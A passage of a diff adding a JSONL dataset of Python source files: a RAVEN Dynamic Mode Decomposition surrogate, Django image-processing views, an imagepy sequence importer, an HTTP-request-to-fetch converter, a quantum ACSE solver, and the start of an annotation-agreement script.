diff --git "a/2332.jsonl" "b/2332.jsonl" new file mode 100644--- /dev/null +++ "b/2332.jsonl" @@ -0,0 +1,910 @@ +{"seq_id":"21359824939","text":"\nimport sys\nimport numpy as np\nfrom scipy import spatial\n#External Modules End--------------------------------------------------------------------------------\n\n#Internal Modules------------------------------------------------------------------------------------\nfrom ..utils import mathUtils\nfrom ..utils import InputData, InputTypes\nfrom ..SupervisedLearning import SupervisedLearning\n#Internal Modules End--------------------------------------------------------------------------------\n\n\nclass DMD(SupervisedLearning):\n \"\"\"\n This surrogate is aimed to construct a \"time-dep\" surrogate based on\n Dynamic Mode Decomposition method.\n Ref. Kutz, Brunton, Brunton, Proctor. Dynamic Mode Decomposition:\n Data-Driven Modeling of Complex Systems. SIAM Other Titles in\n Applied Mathematics, 2016\n \"\"\"\n info = {'problemtype':'regression', 'normalize':True}\n\n @classmethod\n def getInputSpecification(cls):\n \"\"\"\n Method to get a reference to a class that specifies the input data for\n class cls.\n @ In, cls, the class for which we are retrieving the specification\n @ Out, inputSpecification, InputData.ParameterInput, class to use for\n specifying input of cls.\n \"\"\"\n specs = super().getInputSpecification()\n specs.description = r\"\"\"The \\xmlString{DMD} ROM aimed to construct a time-dependent (or any other monotonic\n variable) surrogate model based on Dynamic Mode Decomposition\n This surrogate is aimed to perform a ``dimensionality reduction regression'', where, given time\n series (or any monotonic-dependent variable) of data, a set of modes each of which is associated\n with a fixed oscillation frequency and decay/growth rate is computed\n in order to represent the data-set.\n In order to use this Reduced Order Model, the \\xmlNode{ROM} attribute\n \\xmlAttr{subType} needs to be set equal to \\xmlString{DMD}.\n \\\\\n Once the ROM is trained (\\textbf{Step} \\xmlNode{RomTrainer}), its parameters/coefficients can be exported into an XML file\n via an \\xmlNode{OutStream} of type \\xmlAttr{Print}. The following variable/parameters can be exported (i.e. 
\\xmlNode{what} node\n in \\xmlNode{OutStream} of type \\xmlAttr{Print}):\n \\begin{itemize}\n \\item \\xmlNode{rankSVD}, see XML input specifications below\n \\item \\xmlNode{energyRankSVD}, see XML input specifications below\n \\item \\xmlNode{rankTLSQ}, see XML input specifications below\n \\item \\xmlNode{exactModes}, see XML input specifications below\n \\item \\xmlNode{optimized}, see XML input specifications below\n \\item \\xmlNode{features}, see XML input specifications below\n \\item \\xmlNode{timeScale}, XML node containing the array of the training time steps values\n \\item \\xmlNode{dmdTimeScale}, XML node containing the array of time scale in the DMD space (can be used as mapping\n between the \\xmlNode{timeScale} and \\xmlNode{dmdTimeScale})\n \\item \\xmlNode{eigs}, XML node containing the eigenvalues (imaginary and real part)\n \\item \\xmlNode{amplitudes}, XML node containing the amplitudes (imaginary and real part)\n \\item \\xmlNode{modes}, XML node containing the dynamic modes (imaginary and real part)\n \\end{itemize}\"\"\"\n specs.addSub(InputData.parameterInputFactory(\"dmdType\", contentType=InputTypes.makeEnumType(\"dmd\", \"dmdType\", [\"dmd\", \"hodmd\"]),\n descr=r\"\"\"the type of Dynamic Mode Decomposition to apply.Available are:\n \\begin{itemize}\n \\item \\textit{dmd}, for classical DMD\n \\item \\textit{hodmd}, for high order DMD.\n \\end{itemize}\"\"\", default=\"dmd\"))\n specs.addSub(InputData.parameterInputFactory(\"pivotParameter\", contentType=InputTypes.StringType,\n descr=r\"\"\"defines the pivot variable (e.g., time) that represents the\n independent monotonic variable\"\"\", default=\"time\"))\n specs.addSub(InputData.parameterInputFactory(\"rankSVD\", contentType=InputTypes.IntegerType,\n descr=r\"\"\"defines the truncation rank to be used for the SVD.\n Available options are:\n \\begin{itemize}\n \\item \\textit{-1}, no truncation is performed\n \\item \\textit{0}, optimal rank is internally computed\n \\item \\textit{>1}, this rank is going to be used for the truncation\n \\end{itemize}\"\"\", default=None))\n specs.addSub(InputData.parameterInputFactory(\"energyRankSVD\", contentType=InputTypes.FloatType,\n descr=r\"\"\"energy level ($0.0 < float < 1.0$) used to compute the rank such\n as computed rank is the number of the biggest singular values needed to reach the energy identified by\n \\xmlNode{energyRankSVD}. This node has always priority over \\xmlNode{rankSVD}\"\"\", default=None))\n specs.addSub(InputData.parameterInputFactory(\"rankTLSQ\", contentType=InputTypes.IntegerType,\n descr=r\"\"\"$int > 0$ that defines the truncation rank to be used for the total\n least square problem. 
If not inputted, no truncation is applied\"\"\", default=None))\n specs.addSub(InputData.parameterInputFactory(\"exactModes\", contentType=InputTypes.BoolType,\n descr=r\"\"\"True if the exact modes need to be computed (eigenvalues and\n eigenvectors), otherwise the projected ones (using the left-singular matrix after SVD).\"\"\", default=True))\n specs.addSub(InputData.parameterInputFactory(\"optimized\", contentType=InputTypes.FloatType,\n descr=r\"\"\"True if the amplitudes need to be computed minimizing the error\n between the modes and all the time-steps or False, if only the 1st timestep only needs to be considered\"\"\", default=False))\n return specs\n\n def __init__(self):\n \"\"\"\n DMD constructor\n @ In, None\n @ Out, None\n \"\"\"\n super().__init__()\n self.dmdParams = {} # dmd settings container\n self.printTag = 'DMD' # print tag\n self._dynamicHandling = True # This ROM is able to manage the time-series on its own. No need for special treatment outside\n self.pivotParameterID = None # pivot parameter\n # variables filled up in the training stages\n self._amplitudes = {} # {'target1': vector of amplitudes,'target2':vector of amplitudes, etc.}\n self._eigs = {} # {'target1': vector of eigenvalues,'target2':vector of eigenvalues, etc.}\n self._modes = {} # {'target1': matrix of dynamic modes,'target2':matrix of dynamic modes, etc.}\n self.__Atilde = {} # {'target1': matrix of lowrank operator from the SVD,'target2':matrix of lowrank operator from the SVD, etc.}\n self.pivotValues = None # pivot values (e.g. time)\n self.KDTreeFinder = None # kdtree weighting model\n self.timeScales = {} # time-scales (training and dmd). {'training' and 'dmd':{t0:float,'dt':float,'intervals':int}}\n self.featureVals = None # feature values\n\n def _handleInput(self, paramInput):\n \"\"\"\n Function to handle the common parts of the model parameter input.\n @ In, paramInput, InputData.ParameterInput, the already parsed input.\n @ Out, None\n \"\"\"\n super()._handleInput(paramInput)\n settings, notFound = paramInput.findNodesAndExtractValues(['pivotParameter','rankSVD', 'energyRankSVD',\n 'rankTLSQ','exactModes','optimized', 'dmdType'])\n # notFound must be empty\n assert(not notFound)\n self.pivotParameterID = settings.get(\"pivotParameter\",\"time\") # pivot parameter\n self.dmdParams['rankSVD' ] = settings.get('rankSVD',None) # -1 no truncation, 0 optimal rank is computed, >1 truncation rank\n self.dmdParams['energyRankSVD' ] = settings.get('energyRankSVD',None) # 0.0 < float < 1.0, computed rank is the number of the biggest sv needed to reach the energy identified by \"energyRankSVD\"\n self.dmdParams['rankTLSQ' ] = settings.get('rankTLSQ',None) # truncation rank for total least square\n self.dmdParams['exactModes' ] = settings.get('exactModes',True) # True if the exact modes need to be computed (eigs and eigvs), otherwise the projected ones (using the left-singular matrix)\n self.dmdParams['optimized' ] = settings.get('optimized',False) # amplitudes computed minimizing the error between the mods and all the timesteps (True) or 1st timestep only (False)\n self.dmdParams['dmdType' ] = settings.get('dmdType','dmd') # the dmd type to be applied. Currently we support dmd and hdmd (high order dmd)\n\n # some checks\n if self.dmdParams['rankSVD'] is not None and self.dmdParams['energyRankSVD'] is not None:\n self.raiseAWarning('Both \"rankSVD\" and \"energyRankSVD\" have been inputted. 
\"energyRankSVD\" is predominant and will be used!')\n # check if the pivotParameter is among the targetValues\n if self.pivotParameterID not in self.target:\n self.raiseAnError(IOError,\"The pivotParameter \"+self.pivotParameterID+\" must be part of the Target space!\")\n if len(self.target) < 2:\n self.raiseAnError(IOError,\"At least one Target in addition to the pivotParameter \"+self.pivotParameterID+\" must be part of the Target space!\")\n\n def __setstate__(self,state):\n \"\"\"\n Initializes the DMD with the data contained in state\n @ In, state, dict, it contains all the information needed by the ROM to be initialized\n @ Out, None\n \"\"\"\n self.__dict__.update(state)\n self.KDTreeFinder = spatial.KDTree(self.featureVals)\n\n def _localNormalizeData(self,values,names,feat):\n \"\"\"\n Overwrites default normalization procedure.\n @ In, values, unused\n @ In, names, unused\n @ In, feat, feature to normalize\n @ Out, None\n \"\"\"\n self.muAndSigmaFeatures[feat] = (0.0,1.0)\n\n #######\n def _getTimeScale(self,dmd=True):\n \"\"\"\n Get the ts of the dmd (if dmd = True) or training (if dmd = False) reconstructed time scale.\n @ In, dmd, bool, optional, True if dmd time scale needs to be returned, othewise training one\n @ Out, timeScale, numpy.array, the dmd or training reconstructed time scale\n \"\"\"\n timeScaleInfo = self.timeScales['dmd'] if dmd else self.timeScales['training']\n timeScale = np.arange(timeScaleInfo['t0'], (timeScaleInfo['intervals']+1)*timeScaleInfo['dt'], timeScaleInfo['dt'])\n return timeScale\n\n def __getTimeEvolution(self, target):\n \"\"\"\n Get the time evolution of each mode\n @ In, target, str, the target for which mode evolution needs to be retrieved for\n @ Out, timeEvol, numpy.ndarray, the matrix that contains all the time evolution (by row)\n \"\"\"\n omega = np.log(self._eigs[target]) / self.timeScales['training']['dt']\n van = np.exp(np.multiply(*np.meshgrid(omega, self._getTimeScale())))\n timeEvol = (van * self._amplitudes[target]).T\n return timeEvol\n\n def _reconstructData(self, target):\n \"\"\"\n Retrieve the reconstructed data\n @ In, target, str, the target for which the data needs to be reconstructed\n @ Out, data, numpy.ndarray, the matrix (nsamples,n_time_steps) containing the reconstructed data\n \"\"\"\n data = self._modes[target].dot(self.__getTimeEvolution(target))\n return data\n\n def _train(self,featureVals,targetVals):\n \"\"\"\n Perform training on input database stored in featureVals.\n @ In, featureVals, numpy.ndarray, shape=[n_timeStep, n_dimensions], an array of input data # Not use for ARMA training\n @ In, targetVals, numpy.ndarray, shape = [n_timeStep, n_dimensions], an array of time series data\n \"\"\"\n self.featureVals = featureVals\n self.KDTreeFinder = spatial.KDTree(featureVals)\n pivotParamIndex = self.target.index(self.pivotParameterID)\n self.pivotValues = targetVals[0,:,pivotParamIndex]\n ts = len(self.pivotValues)\n for target in list(set(self.target) - set([self.pivotParameterID])):\n targetParamIndex = self.target.index(target)\n snaps = targetVals[:,:,targetParamIndex]\n # if number of features (i.e. 
samples) > number of snapshots, we apply the high order DMD or HODMD has been requested\n imposedHODMD = False\n if self.dmdParams['dmdType'] == 'hodmd' or snaps.shape[0] < snaps.shape[1]:\n v = max(snaps.shape[1] - snaps.shape[0],2)\n imposedHODMD = True\n snaps = np.concatenate([snaps[:, i:snaps.shape[1] - v + i + 1] for i in range(v) ], axis=0)\n # overlap snaps\n X, Y = snaps[:, :-1], snaps[:, 1:]\n if self.dmdParams['rankTLSQ'] is not None:\n X, Y = mathUtils.computeTruncatedTotalLeastSquare(X, Y, self.dmdParams['rankTLSQ'])\n rank = self.dmdParams['energyRankSVD'] if self.dmdParams['energyRankSVD'] is not None else (self.dmdParams['rankSVD'] if self.dmdParams['rankSVD'] is not None else -1)\n U, s, V = mathUtils.computeTruncatedSingularValueDecomposition(X, rank)\n # lowrank operator from the SVD of matrices X and Y\n self.__Atilde[target] = U.T.conj().dot(Y).dot(V) * np.reciprocal(s)\n self._eigs[target], self._modes[target] = mathUtils.computeEigenvaluesAndVectorsFromLowRankOperator(self.__Atilde[target],\n Y, U, s, V,\n self.dmdParams['exactModes'])\n if imposedHODMD:\n self._modes[target] = self._modes[target][:targetVals[:,:,targetParamIndex].shape[0],:]\n self._amplitudes[target] = mathUtils.computeAmplitudeCoefficients(self._modes[target],\n targetVals[:,:,targetParamIndex],\n self._eigs[target],\n self.dmdParams['optimized'])\n # Default timesteps (even if the time history is not equally spaced in time, we \"trick\" the dmd to think it).\n self.timeScales = dict.fromkeys( ['training','dmd'],{'t0': 0, 'intervals': ts - 1, 'dt': 1})\n\n def __evaluateLocal__(self,featureVals):\n \"\"\"\n This method is used to inquire the DMD to evaluate (after normalization that in\n this case is not performed) a set of points contained in featureVals.\n a KDTree algorithm is used to construct a weighting function for the reconstructed space\n @ In, featureVals, numpy.ndarray, shape= (n_requests, n_dimensions), an array of input data\n @ Out, returnEvaluation , dict, dictionary of values for each target (and pivot parameter)\n \"\"\"\n returnEvaluation = {self.pivotParameterID:self.pivotValues}\n for target in list(set(self.target) - set([self.pivotParameterID])):\n reconstructData = self._reconstructData(target).real\n # find the nearest data and compute weights\n if len(reconstructData) > 1:\n weights, indexes = self.KDTreeFinder.query(featureVals, k=min(2**len(self.features),len(reconstructData)))\n # if 0 (perfect match), assign minimum possible distance\n weights[weights == 0] = sys.float_info.min\n weights =1./weights\n # normalize to 1\n weights = weights/weights.sum()\n for point in range(len(weights)):\n returnEvaluation[target] = np.sum ((weights[point,:]*reconstructData[indexes[point,:]].T) , axis=1)\n else:\n returnEvaluation[target] = reconstructData[0]\n\n return returnEvaluation\n\n def writeXMLPreamble(self, writeTo, targets = None):\n \"\"\"\n Specific local method for printing anything desired to xml file at the begin of the print.\n @ In, writeTo, xmlUtils.StaticXmlElement instance, element to write to\n @ In, targets, list, list of targets for whom information should be written.\n @ Out, None\n \"\"\"\n # add description\n super().writeXMLPreamble(writeTo, targets)\n description = ' This XML file contains the main information of the DMD ROM.'\n description += ' If \"modes\" (dynamic modes), \"eigs\" (eigenvalues), \"amplitudes\" (mode amplitudes)'\n description += ' and \"dmdTimeScale\" (internal dmd time scale) are dumped, the method'\n description += ' is explained in 
P.J. Schmid, Dynamic mode decomposition'\n description += ' of numerical and experimental data, Journal of Fluid Mechanics 656.1 (2010), 5-28'\n writeTo.addScalar('ROM',\"description\",description)\n\n def writeXML(self, writeTo, targets = None, skip = None):\n \"\"\"\n Adds requested entries to XML node.\n @ In, writeTo, xmlTuils.StaticXmlElement, element to write to\n @ In, targets, list, optional, list of targets for whom information should be written\n @ In, skip, list, optional, list of targets to skip\n @ Out, None\n \"\"\"\n if not self.amITrained:\n self.raiseAnError(RuntimeError,'ROM is not yet trained!')\n if skip is None:\n skip = []\n\n # check what\n what = ['exactModes','optimized','dmdType','features','timeScale','eigs','amplitudes','modes','dmdTimeScale']\n if self.dmdParams['rankTLSQ'] is not None:\n what.append('rankTLSQ')\n what.append('energyRankSVD' if self.dmdParams['energyRankSVD'] is not None else 'rankSVD')\n if targets is None:\n readWhat = what\n else:\n readWhat = targets\n for s in skip:\n if s in readWhat:\n readWhat.remove(s)\n if not set(readWhat) <= set(what):\n self.raiseAnError(IOError, \"The following variables specified in node are not recognized: \"+ \",\".join(np.setdiff1d(readWhat, what).tolist()) )\n else:\n what = readWhat\n\n target = self.target[-1]\n toAdd = ['exactModes','optimized','dmdType']\n if self.dmdParams['rankTLSQ'] is not None:\n toAdd.append('rankTLSQ')\n toAdd.append('energyRankSVD' if self.dmdParams['energyRankSVD'] is not None else 'rankSVD')\n self.dmdParams['rankSVD'] = self.dmdParams['rankSVD'] if self.dmdParams['rankSVD'] is not None else -1\n\n for add in toAdd:\n if add in what :\n writeTo.addScalar(target,add,self.dmdParams[add])\n targNode = writeTo._findTarget(writeTo.getRoot(), target)\n if \"features\" in what:\n writeTo.addScalar(target,\"features\",' '.join(self.features))\n if \"timeScale\" in what:\n writeTo.addScalar(target,\"timeScale\",' '.join(['%.6e' % elm for elm in self.pivotValues.ravel()]))\n if \"dmdTimeScale\" in what:\n writeTo.addScalar(target,\"dmdTimeScale\",' '.join(['%.6e' % elm for elm in self._getTimeScale()]))\n if \"eigs\" in what:\n eigsReal = \" \".join(['%.6e' % self._eigs[target][indx].real for indx in\n range(len(self._eigs[target]))])\n writeTo.addScalar(\"eigs\",\"real\", eigsReal, root=targNode)\n eigsImag = \" \".join(['%.6e' % self._eigs[target][indx].imag for indx in\n range(len(self._eigs[target]))])\n writeTo.addScalar(\"eigs\",\"imaginary\", eigsImag, root=targNode)\n if \"amplitudes\" in what:\n ampsReal = \" \".join(['%.6e' % self._amplitudes[target][indx].real for indx in\n range(len(self._amplitudes[target]))])\n writeTo.addScalar(\"amplitudes\",\"real\", ampsReal, root=targNode)\n ampsImag = \" \".join(['%.6e' % self._amplitudes[target][indx].imag for indx in\n range(len(self._amplitudes[target]))])\n writeTo.addScalar(\"amplitudes\",\"imaginary\", ampsImag, root=targNode)\n if \"modes\" in what:\n for smp in range(len(self._modes[target])):\n valDict = {'real': ' '.join([ '%.6e' % elm for elm in self._modes[target][smp,:].real]),\n 'imaginary':' '.join([ '%.6e' % elm for elm in self._modes[target][smp,:].imag])}\n attributeDict = {self.features[index]:'%.6e' % self.featureVals[smp,index] for index in range(len(self.features))}\n writeTo.addVector(\"modes\",\"realization\",valDict, root=targNode, attrs=attributeDict)\n\n def __confidenceLocal__(self,featureVals):\n \"\"\"\n The confidence associate with a set of requested evaluations\n @ In, featureVals, numpy.ndarray, shape= 
(n_requests, n_dimensions), an array of input data\n @ Out, None\n \"\"\"\n pass\n\n def __resetLocal__(self,featureVals):\n \"\"\"\n After this method the ROM should be described only by the initial parameter settings\n @ In, featureVals, numpy.ndarray, shape= (n_samples, n_dimensions), an array of input data (training data)\n @ Out, None\n \"\"\"\n self.amITrained = False\n self._amplitudes = {}\n self._eigs = {}\n self._modes = {}\n self.__Atilde = {}\n self.pivotValues = None\n self.KDTreeFinder = None\n self.featureVals = None\n\n def __returnInitialParametersLocal__(self):\n \"\"\"\n This method returns the initial parameters of the SM\n @ In, None\n @ Out, self.dmdParams, dict, the dict of the SM settings\n \"\"\"\n return self.dmdParams\n\n def __returnCurrentSettingLocal__(self):\n \"\"\"\n This method is used to pass the set of parameters of the ROM that can change during simulation\n @ In, None\n @ Out, self.dmdParams, dict, the dict of the SM settings\n \"\"\"\n return self.dmdParams\n","repo_name":"idaholab/raven","sub_path":"ravenframework/SupervisedLearning/DynamicModeDecomposition.py","file_name":"DynamicModeDecomposition.py","file_ext":"py","file_size_in_byte":22051,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"38"} +{"seq_id":"16494946489","text":"# Create your views here.\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom django.shortcuts import render_to_response\r\nfrom django.template.context import RequestContext\r\nfrom django.http import HttpResponseRedirect , HttpResponse\r\nimport Image , os\r\nfrom picture import settings\r\nimport ImageFile\r\n\r\n# this is for uploading picture\r\n@csrf_exempt\r\ndef load_image(request):\r\n return render_to_response('load_image.html' , context_instance=RequestContext(request))\r\n\r\ndef change_picture_size(pic_path):\r\n change_width = 200\r\n change_height = 300\r\n pic_path = pic_path.replace('\\\\' , '/')\r\n pic_img = Image.open(pic_path)\r\n pic_img = pic_img.resize((change_width , change_height) , Image.ANTIALIAS)\r\n new_pic_path = os.path.join(settings.Img_dir , \"resize_pic.jpg\")\r\n pic_img.save(new_pic_path)\r\n return 0\r\n\r\n@csrf_exempt\r\ndef upload(request):\r\n f = request.FILES\r\n if f.get('docfile') is not None:\r\n fi = f.get('docfile')\r\n parser = ImageFile.Parser()\r\n for chunk in fi.chunks(): \r\n parser.feed(chunk) \r\n img = parser.close()\r\n name = os.path.join(settings.Img_dir, 'liu.jpg')\r\n img.save(name)\r\n change_picture_size(name)\r\n return render_to_response('load_image.html' , context_instance=RequestContext(request))\r\n else:\r\n return HttpResponseRedirect(\"/load_image/\")\r\n\r\n@csrf_exempt\r\ndef process_picture(request):\r\n pic_name = os.path.join(settings.Img_dir , \"liu.jpg\")\r\n new_width = 200\r\n new_height = 300\r\n pic_img = Image.open(pic_name)\r\n pic_img = pic_img.resize((new_width , new_height) , Image.ANTIALIAS)\r\n new_liu_path = pic_name.replace(\"liu\" , \"new_liu\")\r\n pic_img.save(new_liu_path)\r\n return HttpResponse(\"load\")\r\n\r\n@csrf_exempt\r\ndef gray_process(request):\r\n pic_name = os.path.join(settings.Img_dir , \"new_liu.jpg\")\r\n gray_pic = os.path.join(settings.Img_dir , \"gray_picture.jpg\")\r\n if os.path.exists(pic_name):\r\n pic_img = Image.open(pic_name)\r\n gray_img = pic_img.convert('L')\r\n gray_img.save(gray_pic)\r\n ret = \"gray_picture\"\r\n else:\r\n ret = \"not_gray_picture\"\r\n return HttpResponse(ret)\r\n\r\n 
\r\n","repo_name":"waytai/processpicture","sub_path":"loadpicture/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71225522991","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 15 14:42:55 2016\n@author: yxl\n\"\"\"\n\nfrom sciapp.action import dataio\nfrom skimage.io import imread\nfrom sciapp.action import Free\nfrom glob import glob\nimport os.path as osp\n \nclass Plugin(Free):\n title = 'Import Sequence'\n para = {'path':'', 'start':0, 'end':0, 'step':1, 'title':'sequence'}\n\n def load(self):\n self.filt = dataio.ReaderManager.names()\n return True\n\n def show(self):\n filt = '|'.join(['%s files (*.%s)|*.%s'%(i.upper(),i,i) for i in self.filt])\n rst = self.app.get_path('Import sequence', self.filt, 'open')\n if rst is None: return rst\n self.para['path'] = rst\n files = self.getfiles(self.para['path'])\n nfs = len(files)\n self.para['end'] = nfs-1\n self.view = [(str, 'title', 'Title',''), \n (int, 'start', (0, nfs-1), 0, 'Start', '0~{}'.format(nfs-1)),\n (int, 'end', (0, nfs-1), 0, 'End', '0~{}'.format(nfs-1)),\n (int, 'step', (0, nfs-1), 0, 'Step', '')]\n return self.app.show_para('Import sequence', self.para, self.view)\n\n def getfiles(self, name):\n p,f = osp.split(name)\n s = p+'/*.'+name.split('.')[-1]\n return glob(s)\n\n def readimgs(self, names, read, shape, dtype):\n imgs = []\n for i in range(len(names)):\n self.progress(i, len(names))\n img = read(names[i])\n if img.shape!=shape or img.dtype!=dtype:\n print('error:', names[i])\n continue\n imgs.append(img)\n return imgs\n\n #process\n def run(self, para = None):\n fp, fn = osp.split(para['path'])\n fn, fe = osp.splitext(fn)\n read = dataio.ReaderManager.get(name=fe[1:])\n try: img = read(para['path'])\n except: return self.app.alert('unknown img format!')\n files = self.getfiles(para['path'])\n files.sort()\n imgs = self.readimgs(files[para['start']:para['end']+1:para['step']], \n read, img.shape, img.dtype)\n self.app.show('imgs', imgs, para['title'])\n\nif __name__ == '__main__':\n print(Plugin.title)\n app = wx.App(False)\n Plugin().run()","repo_name":"Image-Py/imagepy","sub_path":"imagepy/menus/File/Import/sequence_plg.py","file_name":"sequence_plg.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":1265,"dataset":"github-code","pt":"38"} +{"seq_id":"33479775801","text":"import json\n\nclass BaseRequestFormatter:\n def format_request(self, request, protocol, host, port_suffix):\n raise NotImplementedError(\"Subclasses must implement this method\")\n\nclass FetchRequestFormatter(BaseRequestFormatter):\n def format_request(self, request, protocol, host, port_suffix):\n try:\n # Split the request into headers and body\n http_request = request.split(\"\\r\\n\\r\\n\", 1)\n headers_lines, body = http_request[0].split(\"\\r\\n\", 1), http_request[1]\n \n headers_lines = [x.encode('UTF8') for x in headers_lines]\n request_line, header_lines = headers_lines[0], headers_lines[1:]\n header_lines = header_lines[0].split(\"\\r\\n\")\n \n # Extract the request method and URL path\n method, url_path, _ = request_line.split(\" \")\n full_url = \"{protocol}://{host}{port_suffix}{url_path}\".format(protocol=protocol, host=host, port_suffix=port_suffix, url_path=url_path)\n full_url = full_url.replace('\\'', '\\\\\\'')\n \n \n # Extract the headers from the request\n headers = {}\n for header_line in header_lines:\n header_parts = 
header_line.split(\":\")\n print(header_parts)\n header_name = header_parts[0].strip()\n header_value = ':'.join(header_parts[1:]).strip()\n headers[header_name] = header_value\n\n # Generate the Fetch API call with appropriate headers and body\n fetch_headers = json.dumps(headers, indent=4)\n fetch_body = json.dumps(body)\n \n # Do not include request \"body\" if method is GET or HEAD\n if method == \"GET\" or method == \"HEAD\":\n fetch_code = \"\"\"fetch('{url}', {{\n method: '{method}',\n headers: {fetch_headers},\n }})\n .then(response => response.text())\n .then(data => console.log(data))\n .catch(error => console.error('Error:', error));\n \"\"\".format(url=full_url, method=method, fetch_headers=fetch_headers)\n else:\n fetch_code = \"\"\"fetch('{url}', {{\n method: '{method}',\n headers: {fetch_headers},\n body: {fetch_body}\n }})\n .then(response => response.text())\n .then(data => console.log(data))\n .catch(error => console.error('Error:', error));\n \"\"\".format(url=full_url, method=method, fetch_headers=fetch_headers, fetch_body=fetch_body)\n \n except Exception as e:\n print(\"Error occurred while converting the request to Fetch: {}\".format(e))\n fetch_code = \"Error: Could not convert the request to Fetch\"\n \n print(fetch_code)\n return fetch_code\n\n\nclass Python3RequestFormatter(BaseRequestFormatter):\n def format_request(self, request, protocol, host, port_suffix):\n # Logic to convert request to Python 3 format\n # ...\n python3_code = \"TODO\"\n return python3_code\n","repo_name":"C-960/HTTP-Request-Converter","sub_path":"request_formatters.py","file_name":"request_formatters.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"72857276912","text":"import numpy as np\nimport sys \nnp.set_printoptions(linewidth=200,suppress=False,precision=3)\nfrom hqca.tools import *\nfrom hqca.operators import *\nfrom functools import reduce\nfrom hqca.core import *\nfrom copy import deepcopy as copy\nimport timeit\nfrom hqca.processes import StandardProcess\nfrom hqca.tomography import StandardTomography\n\n\n\n\ndef solvecACSE(\n acse,\n operator=None,\n S_min=1e-10,\n tomo=None,\n verbose=True,\n transform=None,\n matrix=False,\n norm='fro',\n **kw,\n ):\n '''\n Solve the ACSE, which traditionally has elements defined as:\n A^ik_jl = < [a_i+ a_k+ a_l a_j ,H] >\n\n Here, we instead let the residuals of A represent the gradient direction,\n which properly is given as <[H,i+ k+ l j ]>\n\n Note that Euler's method adds a minus sign appropriately\n\n '''\n store = acse.store\n alp = store.alpha_mo['qubit']\n bet = store.beta_mo['qubit']\n if store.Ne_as<3 and tomo.p==2:\n D3 = RDM(\n order=3,\n alpha=alp,\n beta = bet,\n rdm = None,\n Ne=acse.store.No_as)\n #\n circ = acse._generate_circuit(\n op=operator,\n tomo=tomo,\n order=2,\n compact=False)\n D2 = circ.rdm\n elif tomo.p==3:\n circ = acse._generate_circuit(\n op=operator,\n tomo=tomo,\n order=3,\n compact=False)\n D3 = circ.rdm\n D2 = D3.reduce_order()\n else:\n raise ResidualError\n if verbose:\n print('-- -- -- -- -- -- -- -- -- -- --')\n print('classical ACSE')\n print('-- -- -- -- -- -- -- -- -- -- --')\n print('trace of the 3-RDM: {}'.format(D3.trace()))\n print('')\n keys = acse.rdme\n D2 = np.real(D2.rdm)\n D3 = np.real(D3.rdm)\n Na = len(alp)\n No = 2*Na\n S = []\n tS = []\n new = Operator()\n newF= Operator()\n max_val=0\n # \n #\n A = np.zeros((No,No,No,No),dtype=np.complex_)\n #K1 = store.H.ints_1e\n #K2 = 
store.H.ints_2e\n #W = K2 - K2.transpose(0,1,3,2)\n W = (store.H.K2 - store.H.K2.transpose(0,1,3,2))\n so = alp+bet\n for i in so:\n for j in so:\n for k in so:\n for l in so:\n A[i,k,j,l]-= np.dot(D2[:,:,j,l],W[:,:,i,k].T).trace()\n A[i,k,j,l]+= np.dot(D2[:,:,i,k],W[:,:,j,l].T).trace()\n for r in so:\n A[i,k,j,l]+= np.dot(D3[:,r,k,j,l,:],W[:,r,i,:].T).trace()\n A[i,k,j,l]-= np.dot(D3[:,r,i,j,l,:],W[:,r,k,:].T).trace()\n A[i,k,j,l]-= np.dot(D3[i,k,:,r,:,j],W[:,l,r,:].T).trace()\n A[i,k,j,l]+= np.dot(D3[i,k,:,r,:,l],W[:,j,r,:].T).trace()\n if matrix:\n newA = np.zeros(1*len(keys))\n for n,inds in enumerate(keys):\n i,k,l,j = inds[0],inds[1],inds[2],inds[3]\n newA[n]=A[i,k,l,j]\n #newA[n+len(keys)]=A[i,k,l,j]\n #newA[n+2*len(keys)]=A[i,k,l,j]\n #newA[n+3*len(keys)]=A[i,k,l,j]\n return -newA\n else:\n nz = np.nonzero(A)\n new = Operator()\n norm = 0\n for i,k,j,l in zip(nz[0],nz[1],nz[2],nz[3]):\n term = A[i,k,j,l]\n if abs(term)>=S_min:\n new+= FermiString(\n coeff=-term,\n indices=[i,k,l,j],\n ops='++--',\n N = acse.qs.dim,\n )\n norm+= np.real(np.conj(term)*term)\n\n assert (np.sqrt(norm)-np.linalg.norm(A))<1e-8\n return new,0.5*np.linalg.norm(A)\n\n\n\n","repo_name":"damazz/HQCA","sub_path":"hqca/acse/_class_A_acse.py","file_name":"_class_A_acse.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"5521871427","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport argparse\nimport logging\nimport sys\nimport pandas\n\nimport numpy as np\nfrom pandas_confusion import ConfusionMatrix\n\nfrom common import NODES\n\nLANGCODES = (\"Romanian\",\"ro\"), (\"Polish\", \"pl\"), (\"German\", \"de\"), (\"Czech\", \"cs\")\n\ndef get_kappa(cm):\n # The pandas_confusion kappa implementation crashes on some platforms,\n # so I reimplement it here.\n df = cm.to_dataframe()\n N = df.sum().sum()\n #print(N)\n sum_diag = np.trace(df)\n #print(sum_diag)\n sum_row = df.sum(axis=0)\n sum_col = df.sum(axis=1)\n p_e = float(sum(sum_row*sum_col)) / (N*N)\n print(\"normalised sum_row x sum_col\")\n print(((sum_row*sum_col) / (N*N)))\n #print(sum_row)\n #print(sum_col)\n #print (p_e)\n p_o = float(sum_diag) / N\n #print(p_o)\n kappa = (p_o - p_e) / (1 - p_e)\n return kappa,p_o,p_e\n\ndef print_overall_stats(by_lang,args):\n print(\"Counts of doubly annotated nodes\") \n node_count = len(by_lang)\n sentence_count = len(by_lang['sent_id'].value_counts())\n print(\"Sentence count: {}; Node count: {}\".format(sentence_count, node_count))\n\ndef print_overall_iaa(by_lang, lang, args):\n groups = ((\"A\", \"B\", \"R\", \"O\", \"G\"),)\n if args.separate_label_groups:\n groups = ((\"A\", \"B\"), (\"R\", \"O\", \"G\"), (\"R\", 